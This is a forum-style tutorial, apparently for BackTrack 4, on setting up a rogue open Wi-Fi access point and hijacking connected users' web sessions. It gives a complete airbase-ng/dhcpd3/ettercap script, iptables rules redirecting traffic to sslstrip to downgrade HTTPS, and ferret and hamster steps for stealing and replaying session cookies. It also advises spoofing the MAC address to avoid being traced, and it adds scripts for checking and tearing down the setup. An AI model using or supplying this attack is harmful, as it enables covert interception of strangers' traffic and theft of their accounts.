First off, this is a tutorial based on fifo_thekid's information. So hats off to you, sir.
OK. What we're going to be doing is setting up a rogue access point and sidejacking session cookies using ferret and hamster. Here's what you will need:
Roguev3.sh
ettercap
dhcp3-server (with custom dhcpd.conf file)
ferret
hamster
2 Network Interfaces (1 wired + 1 wireless, or 2 wireless. The wireless interface that will become the rogue AP needs to be capable of monitor mode, because airbase-ng runs on a monitor interface.)
All of these are built into BackTrack 4 Pre Final (BT4PF), with the exception of Roguev3.sh and (obviously) the custom dhcpd.conf file and the network interfaces. Go to your /pentest/wireless directory and create a new file called Roguev3.sh and fill it in as follows:
Code:
#!/bin/bash
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
echo -n "Enter your wireless interface MAC (XX:XX:XX:XX:XX:XX) [Optional]: "
read -e MAC
echo -n "Enter the channel you would like your rogue AP to broadcast on [Optional]: "
read -e CHAN
# Clear out anything left over from a previous run
killall -9 dhcpcd dhcpd3 airbase-ng ettercap 2>/dev/null
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
modprobe tun
# Build the airbase-ng command as an array so an ESSID containing spaces
# ("Free WiFi") stays one argument. -P answers every probe request,
# -C 30 keeps beaconing probed ESSIDs for 30 seconds, -v is verbose.
cmd=(konsole -e airbase-ng -e "$ESSID" -P -C 30 -v)
if [ -n "$CHAN" ]; then
    cmd+=(-c "$CHAN")
fi
if [ -n "$MAC" ]; then
    cmd+=(-a "$MAC")
fi
cmd+=("$WIFACE")
"${cmd[@]}" &
echo "Waiting 10 seconds for the SoftAP to be established"
sleep 10
echo "SoftAP should be working now"
# at0 is the tap interface airbase-ng creates; it is the rogue network's gateway
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
# The kernel normally adds this route with the address above; a "File exists" error here is harmless
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# Start from empty netfilter tables, then NAT the rogue clients out through $IFACE
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
rm -f /var/run/dhcpd.pid
touch /var/run/dhcpd.pid
chgrp dhcpd /var/run/dhcpd.pid
chown dhcpd /var/run/dhcpd.pid
# Serve leases on at0 from the config we write to /etc/dhcp3/dhcpd.conf below
konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
# ettercap in text mode on at0: -p leaves promiscuous mode off, -q keeps it quiet, // // means all hosts
konsole -e ettercap -T -p -q -i at0 // // &
echo "Waiting 8 seconds for port forwarding and the DHCP server"
sleep 8
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "Port forwarding and DHCP should be working now"
NOTE THAT THIS IS NOT MY CODE, BUT I COULD NOT LINK TO A URL.
Credit for this goes to fifo_thekid, because it's his script!
Once you have done that, open a Konsole and type:
Code:
chmod +x /pentest/wireless/Roguev3.sh
so that it can be executed.
Lets get started.
First off, we need to make some changes to the DHCP files. I'll be showing my examples with vim. If you want to use a different editor, more power to you.
So the first thing:
vim /etc/default/dhcp3-server
Down at the very bottom, you will see the INTERFACES line:
INTERFACES=""
Even if there is something filled in between the quotes, that's ok, because we're going to be changing it anyway. Change it to:
INTERFACES="at0"
This tells the dhcp3-server init script which interface to hand out leases on, and it will come into play later when we start the service.
Now we need to change our dhcpd.conf file to hand out IPs the way we want it to. So open a console and go to /etc/dhcp3. We of course want to back up our current dhcpd.conf file to something like dhcpd.conf.old first. Now create a dhcpd.conf file that looks like this:
Code:
#DHCPD CONF FILE
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option routers 10.0.0.1;
    # OpenDNS resolvers. Nothing on 10.0.0.1 answers DNS in this setup, so the
    # resolvers go here; list entries are comma separated and the line needs a semicolon.
    option domain-name-servers 208.67.222.222, 208.67.220.220;
}
This will have our rogue AP hand out 10.0.0.100 through 10.0.0.254 to clients, with 10.0.0.1 (at0) as their gateway and OpenDNS as their resolvers. A missing semicolon or comma in this file makes dhcpd3 refuse to start, so it is worth checking the file with dhcpd3's -t option (test the configuration and exit) before going on.
Now open a Konsole and type:
Code:
/pentest/wireless/Roguev3.sh
You will be prompted for some information:
1. Internet interface. Whatever interface connects to the internet, input that.
2. Wireless interface. Whichever wireless interface is capable of monitor mode, input that.
3. ESSID. Input the name you want the fake AP to broadcast.
4. Wireless interface MAC (covering your tracks). Input a fake MAC here if desired. If you don't, airbase-ng uses the real MAC of the wireless adapter, which makes the rogue AP very easy to trace back to you. This is optional.
5. Channel. Whatever channel you want the fake AP to broadcast on. Also optional.
Some other windows will pop up after a number of seconds. LEAVE THEM ALL RUNNING! These are the airbase-ng, dhcpd3 and ettercap windows the script launched, and they are what keeps the rogue AP up.
Once they finish, open a new shell and start sslstrip, telling it to listen on port 10000 with its -l option so that it matches the redirect in the next step.
sslstrip proxies the HTTP traffic we redirect to it and rewrites the https:// links and redirects in the pages to http://, so the secure sessions we want to see are downgraded to plain HTTP that we can read.
Open another shell and type:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
This sends every TCP connection to port 80 that arrives on the box for forwarding into sslstrip's listener on port 10000. It does not catch HTTPS itself: sslstrip only sees plain HTTP, and its trick is to strip the https:// links out of the pages it proxies so that the victim's next request (the login form, the cookie) goes over HTTP and through this port. A session that starts out as HTTPS (a bookmarked or directly typed https:// URL) stays encrypted and bypasses this setup. If you want only the rogue clients redirected and not anything else that happens to be routed through this box, add -i at0 to the rule.
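Before starting the sniffers it is worth confirming that the plumbing is in the state the script and the rule above are supposed to leave it in: forwarding on, NAT out of the internet interface, and port 80 redirected to sslstrip. The check below is added here and is not part of the original tutorial or of fifo_thekid's script. It assumes eth0 is the internet interface and 10000 is the sslstrip port; run it as root with --live to read the real tables, and with no argument it runs against a constructed iptables-save sample so the logic can be read offline.

```bash
#!/bin/bash
# Added sanity check for the rogue AP plumbing (not from the original
# tutorial or Roguev3.sh). Assumed names: eth0 = internet interface,
# 10000 = sslstrip listener. Usage:
#   ./check_plumbing.sh --live [internet_iface] [sslstrip_port]   (as root)
#   ./check_plumbing.sh                                          (demo on sample)

# Does the nat table masquerade traffic leaving the internet interface?
# $1 = iptables-save output, $2 = internet interface
has_masquerade() {
    printf '%s\n' "$1" | grep -Eq -- "^-A POSTROUTING -o $2 -j MASQUERADE$"
}

# Is TCP port 80 redirected to the sslstrip listener? iptables-save
# prints the REDIRECT target's port as --to-ports.
# $1 = iptables-save output, $2 = sslstrip port
has_redirect() {
    printf '%s\n' "$1" | grep -Eq -- "^-A PREROUTING .*--dport 80 -j REDIRECT --to-ports $2$"
}

# Combined check: one line per item, returns 0 only if everything passes.
# $1 = iptables-save output, $2 = ip_forward value, $3 = internet iface, $4 = sslstrip port
check_plumbing() {
    local rc=0
    if [ "$2" = "1" ]; then
        echo "ok:   ip_forward=1"
    else
        echo "FAIL: ip_forward=$2 (clients will associate but get no internet)"; rc=1
    fi
    if has_masquerade "$1" "$3"; then
        echo "ok:   MASQUERADE on $3"
    else
        echo "FAIL: no MASQUERADE rule on $3 (replies never come back to 10.0.0.0/24)"; rc=1
    fi
    if has_redirect "$1" "$4"; then
        echo "ok:   tcp/80 -> sslstrip on port $4"
    else
        echo "FAIL: tcp/80 is not redirected to port $4 (sslstrip sees nothing)"; rc=1
    fi
    return $rc
}

# Constructed sample of what iptables-save prints after the script and the
# PREROUTING rule above have been applied (not captured from a real box).
DEMO_RULES='*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT'

if [ "${1:-}" = "--live" ]; then
    check_plumbing "$(iptables-save)" "$(cat /proc/sys/net/ipv4/ip_forward)" "${2:-eth0}" "${3:-10000}"
else
    check_plumbing "$DEMO_RULES" 1 eth0 10000
fi
```

A FAIL on ip_forward is the most common one in practice: the script only switches forwarding on after its 8 second sleep, and it is reset to 0 on reboot, so run the live check after the script has finished and again if clients report an AP with no internet.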
In the same shell, type:
Code:
service dhcp3-server start
The Roguev3.sh script launches dhcpd3 in its own window, but if that window exits (as posted, the script pointed dhcpd3 at /etc/dhcpd.conf rather than the /etc/dhcp3/dhcpd.conf we just wrote), start the packaged service manually. The init script uses /etc/dhcp3/dhcpd.conf and the INTERFACES="at0" setting from earlier, so it serves leases on at0. Close the script's dhcpd3 window first if it is still running, so two daemons are not competing for the interface.
Still in the same shell, type:
Code:
/pentest/exploits/ferret/bin/ferret -i at0
This puts ferret to work sniffing at0, the rogue AP's interface, for session cookies and other identifiers in the clients' HTTP traffic. ferret writes what it captures to a hamster.txt file in the directory you start it from, and hamster reads that file, so start hamster from the same directory. Leave this running.
In a new shell, type:
Code:
/pentest/exploits/hamster/bin/hamster
This starts the hamster sidejacking tool, which keeps an eye on the session cookies ferret captures and exposes them through a small web interface. hamster listens as an HTTP proxy on 127.0.0.1 port 1234; a browser pointed at that proxy can borrow a captured session.
Now open up Konqueror. We need to route it through our local hamster proxy to view traffic, so go to Settings > Configure Konqueror and choose Proxy on the left. Pick Manually Specify and set the HTTP proxy to 127.0.0.1 on port 1234.
What you have accomplished now is a rogue AP that people will see when they scan for wireless networks. It shows up as an open network. Once they connect to it, all of their traffic passes through your BackTrack machine before it reaches your internet connection, where you can read it and, through sslstrip, rewrite it. In other words, this is a very sneaky man-in-the-middle attack, with the limitation that only HTTP and sessions sslstrip manages to downgrade are visible to ferret.
Now go to http://hamster in Konqueror (the proxy on port 1234 answers that name itself) and watch for traffic and available sessions. When cookies are captured, the victim hosts show up on the right. Click on a host link to view its sessions; picking a session loads the site in your browser with the victim's cookie, which is the sidejack.
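Roguev3.sh and the manual steps leave the box forwarding, masquerading and redirecting port 80 until a reboot, with several daemons still running, so a teardown is worth having for the end of the session. The helper below is added here and is not part of the original tutorial or of fifo_thekid's script. It assumes at0 is airbase-ng's tap interface, that you pass in the monitor interface name airmon-ng reported (mon0 is typical on BT4), and that the dhcpd.conf backup was named dhcpd.conf.old as suggested above.

```bash
#!/bin/bash
# Added teardown helper (not from the original tutorial or Roguev3.sh).
# Undoes the rogue AP setup in reverse order: sniffers and daemons first,
# then forwarding and the two nat rules, then the interfaces.
# Assumptions: at0 = airbase-ng tap interface; the monitor interface name
# is passed in; /etc/dhcp3/dhcpd.conf.old is the backup made earlier.
# Usage: ./rogue_teardown.sh --run <internet_iface> <monitor_iface>   (as root)
# Without --run it only prints the plan.

# Print the teardown as one shell command per line, without running anything.
# $1 = internet interface (e.g. eth0), $2 = monitor interface (e.g. mon0)
teardown_plan() {
    cat <<EOF
pkill -f sslstrip; pkill -x hamster; pkill -x ferret
killall -q ettercap airbase-ng
service dhcp3-server stop
echo 0 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000
iptables -t nat -D POSTROUTING -o $1 -j MASQUERADE
ifconfig at0 down
airmon-ng stop $2
[ -f /etc/dhcp3/dhcpd.conf.old ] && mv /etc/dhcp3/dhcpd.conf.old /etc/dhcp3/dhcpd.conf
EOF
}

# Execute the plan line by line, reporting but not stopping on failures
# (a rule that is already gone or a daemon that already exited is fine).
run_teardown() {
    teardown_plan "$1" "$2" | while IFS= read -r cmd; do
        echo "+ $cmd"
        sh -c "$cmd" || echo "  (failed, continuing)"
    done
}

if [ "${1:-}" = "--run" ]; then
    run_teardown "${2:?internet interface}" "${3:?monitor interface}"
else
    teardown_plan "${2:-eth0}" "${3:-mon0}"
fi
```

The two iptables lines use -D with the same rule specification that was added, so only the rogue AP's rules go and any other nat rules on the box survive; the script's own --flush at startup is the blunt alternative. Killing airbase-ng also removes at0, so the ifconfig line only matters if airbase-ng was still up when the other daemons were stopped.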
Happy Sidejacking!